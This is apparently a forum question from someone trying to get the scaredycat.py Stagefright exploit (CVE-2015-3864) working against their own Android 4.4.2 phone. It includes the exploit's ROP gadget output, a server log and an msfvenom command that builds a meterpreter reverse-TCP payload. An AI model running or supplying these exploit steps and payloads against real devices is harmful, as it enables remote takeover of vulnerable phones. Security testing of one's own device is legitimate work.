I'm trying to get a reverse shell on my smartphone, a Docomo Fujitsu Arrows NX F-01F [ Android 4.4.2, build # V10R22A (kernel version 3.4.0), ARMv7 arch (armv7l, armeabi-v7a) ]. Stagefright Detector shows that this device is vulnerable to CVE-2015-3864, so I set up the environment to run scaredycat.py on Ubuntu 15.04. I've also pulled libc.so from the phone and generated a new shellcode.bin with my IP/port parameters.
This is how it starts:
ubuntu@ubuntu-VirtualBox:~/scaredycat-master$ python scaredycat.py
**************************************************
*** SCAREDYCAT! version 0.1 beta ***
author: vvn <root@nobody.ninja>
release date: December 8, 2015
please support my work by buying a copy of my EP!
http://dreamcorp.us
http://facebook.com/dreamcorporation
**************************************************
** ON LOCAL NETWORK, URL IS: http://192.168.0.4:8080 **
[*] memcpy : 0xb6edf221
[*] mmap64 : 0xb6ecfeb5
b6edf09c: e280204c add r2, r0, #76 ; 0x4c
b6edf0a0: e8927ff0 ldm r2, {r4, r5, r6, r7, r8, r9, sl, fp, ip, sp, lr}
b6edf0a4: e33d0000 teq sp, #0
b6edf0a8: 133e0000 teqne lr, #0
[*] stack_pivot : 0xb6edf09c
b6ecc29e: bd00 pop {pc}
[*] pop_pc : 0xb6ecc29f
b6ed144c: bd0f pop {r0, r1, r2, r3, pc}
[*] pop_r0_r1_r2_r3_pc : 0xb6ed144d
b6ecf6d6: bdf0 pop {r4, r5, r6, r7, pc}
[*] pop_r4_r5_r6_r7_pc : 0xb6ecf6d7
b6ef9bb8: e59de040 ldr lr, [sp, #64] ; 0x40
b6ef9bbc: e28dd048 add sp, sp, #72 ; 0x48
b6ef9bc0: e12fff1e bx lr
[16/Jun/2017:09:12:18] ENGINE Listening for SIGHUP.
[16/Jun/2017:09:12:18] ENGINE Listening for SIGTERM.
[16/Jun/2017:09:12:18] ENGINE Listening for SIGUSR1.
[16/Jun/2017:09:12:18] ENGINE Bus STARTING
CherryPy Checker:
The Application mounted at '' has an empty config.
[16/Jun/2017:09:12:18] ENGINE Started monitor thread 'Autoreloader'.
[16/Jun/2017:09:12:18] ENGINE Started monitor thread '_TimeoutMonitor'.
[16/Jun/2017:09:12:18] ENGINE Serving on http://0.0.0.0:8080
[16/Jun/2017:09:12:18] ENGINE Bus STARTED
On the phone I can load that html with mp4 when I go to http://192.168.0.4:8080. When the browser loads the page I see the client's queries to the server:
And so forth (the server reloads the page and nothing else happens). I tried different browsers (the default one and Firefox), different IPs, ports, etc. None of that helps. How could I check whether this CVE works on my device, or whether the shellcode is wrong, or ... ?
I create the shellcode with this command:
msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin
I assume it should be a Linux payload, not an Android one. Right?
Now I don't know what to do with this exploit so I'm gonna test other tools, e.g. Metaphor. Those might be more successful than this one, but they are more complicated.